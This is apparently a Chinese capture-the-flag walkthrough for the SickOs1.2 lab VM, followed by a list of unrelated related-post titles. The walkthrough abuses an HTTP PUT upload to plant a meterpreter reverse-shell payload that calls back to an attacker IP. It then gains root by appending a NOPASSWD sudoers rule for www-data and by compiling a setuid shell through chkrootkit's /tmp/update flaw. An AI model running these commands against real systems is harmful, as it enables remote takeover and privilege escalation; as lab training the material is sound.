靶机记录(十三):SickOs1.2 - IIS 中 PUT 漏洞的利用
目录
环境
主机发现
端口扫描
漏洞挖掘
GetShell
法一
法二
法三
提权
chkrootkit 漏洞提权
法一
法二
法三
防火墙规则
清痕迹,留后门
环境
链接:https://pan.baidu.com/s/1OI1bYsnS_LBvMIrQCt1yuw
提取码:lish
主机发现
端口扫描
漏洞挖掘
查看网页支持的访问方式:nmap --script=http-methods --script-args http-methods.url-path=test 192.168.11.147或curl -v -X OPTIONS http://192.168.11.147/test
curl -X PUT -F filedate=@/root/Test.txt http://192.168.11.147/test/Test.txt
GetShell
法一
法二
使用了php/meterpreter_reverse_tcp的反弹模块创建了一个反弹shell的phpmsfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.11.130 LPORT=8080 -f raw > PUT.php
curl -H 'Expect:' -T 'PUT.php' http://192.168.11.147/test/PUT.php
就很无语
法三
提权
chkrootkit 漏洞提权
chkrootkit存在本地提权漏洞
原理:chkrootkit有crontab,会定期以root身份执行/tmp/update文件
法一
法二
echo 'chmod +w /etc/sudoers && echo "www-data ALL=(ALL)NOPASSWD:ALL" >> /etc/sudoers' > /tmp/update
法三
shell.c 文件#include<unistd.h>
void main(void)
{
system("chown root:root /tmp/update"); #用系统命令把update给root
system("chmod 4755 /tmp/update"); #给普通用户执行update的权力
setuid(0); #指定root用户
setgid(0); #指定root组
execl("/bin/sh","sh",NULL); #以root身份执行终端
}
防火墙规则
清痕迹,留后门
靶机记录(十三):SickOs1.2 - IIS 中 PUT 漏洞的利用相关推荐
- IIS写权限漏洞原理利用工具手动版
很老的东西了,严格的说不是漏洞,只是设置不善造成的Bug.八百年遇不到一会,结果前几天不幸碰上了. 用JSKY扫描人家的站,结果扫描器居然直接把人家整站给删了= =#(这也是百年不遇吧....囧,我猜 ...
- 中软实习培训记录十三(0803)
中软实习培训记录十三(0803) 现存问题-数据覆盖为空 问题解决 日志信息--切面 面向切面编程简介 日志打印 现存问题-数据覆盖为空 在前段时间,我们完成了所有功能,又进行了完善.但是我们后续检查 ...
- 详解IIS中URL重写工具的规则条件(Rule conditions)
本文结合官方文档和相关示例,详细记录了在IIS中URL重写工具下的规则条件(Rule conditions)的相关说明.规则条件允许我们通过额外的逻辑规则来过滤和匹配规则模式( rule patter ...
- 【译】在ASP.Net和IIS中删除不必要的HTTP响应头
引入 每次当浏览器向Web服务器发起一个请求的时,都会伴随着一些HTTP头的发送.而这些HTTP头是用于给Web服务器提供一些额外信息以便于处理请求.比如说吧.如果浏览器支持压缩功能,则浏览器会发送A ...
- 在ASP.Net和IIS中删除不必要的HTTP响应头
引入 每次当浏览器向Web服务器发起一个请求的时,都会伴随着一些HTTP头的发送.而这些HTTP头是用于给Web服务器提供一些额外信息以便于处理请求.比如说吧.如果浏览器支持压缩功能,则浏览器会发送A ...
- IIS中部署vue程序,刷新直接404
问题描述:直接访问首页可以刷新,但是在其他页面时候是不能刷新的,原因是路由机制和iis的认知不一致,在centos中配置nginx就ok了,但是在iis中怎么整? 解决方案:一般可以直接解决的方法也就 ...
- 《Dreamweaver CS6 完全自学教程》笔记 第十三章:Dreamweaver 中的 HTML 代码
文章目录 第十三章:Dreamweaver 中的 HTML 代码 13.1 HTML 介绍 13.2 HTML 的基本结构 13.2.1 单标签 13.2.2 双标签 13.2.3 标签属性 13.3 ...
- IIS中死循环的解决方法 dllhost占用大量内存,cpu占用100%
一.dllhost占用大量内存的可能原因: 1 .感染了的病毒 用杀毒软件好好查一查 2.web程序问题 A.在你的程序中,没有及时关闭数据库和记录集的连接很容易造成内存泄漏和sql进程死锁.所以写程 ...
- IIS中安卓APP和苹果APP的mimi 类型配置
IIS中安卓APP和苹果APP的mimi 类型配置,经常配置这两个东西,但是每次都记不住,在这里做个记录,方便自己也方便他人: 扩展名是: .apk MIMI类型是:application/vnd. ...
最新文章
- DPM恢复Exchange 2013单个邮箱
- sql中join的各种用法
- 'MomentumSGD' 'zero_grads'
- svn使用经验---不断总结
- 【Collection、泛型】
- leetcode面试题 16.26. 计算器(栈)
- Vue.js入门系列教程(二)
- 常用个人密码管理软件 .
- Rman创建DG环境
- expdp导出 schema_[转载]导入导出:impdpexpdp
- java try catch_Java - 异常处理机制
- 高级javascript---严格模式
- win10/win11无损扩大C盘空间,跨盘合并C、E盘
- Python_输入年月日计算是今年第几天 考虑闰年二月29天,平年28天
- Excel VBA 学习过程记录
- phpmyadmin mysql配置_phpmyadmin配置方式
- [html + css] SVG动画 发光渐变炫彩猫猫头
- RO、RW和ZI数据解析
- 短信验证php_php如何实现短信验证
- win7计算机管理无用户账户,win7系统右键没有以管理员身份运行解决方法
热门文章
- 1092.结构体习题:通过职工信息输出高于平均工资的职工信息及高于平均工资的职工人数
- C++网络编程中协议族和地址族
- 面向Java新手的日志 起
- IT人论房价 (四) 泡沫和破灭
- JavaScript-BOM
- 人到中年再苦再难,也不要做这3种工作,余生漫长,越老越吃苦
- [翻译论文]A novel embedded min-max approach for feature selection in nonlinear Support Vector Machine cl
- c语言递归计算哈夫曼编码,哈夫曼树遍历求WPL和哈夫曼编码C语言--For初学者
- 怎样才能使你的Mac更加个性化?
- 用jacob读取word的书签列表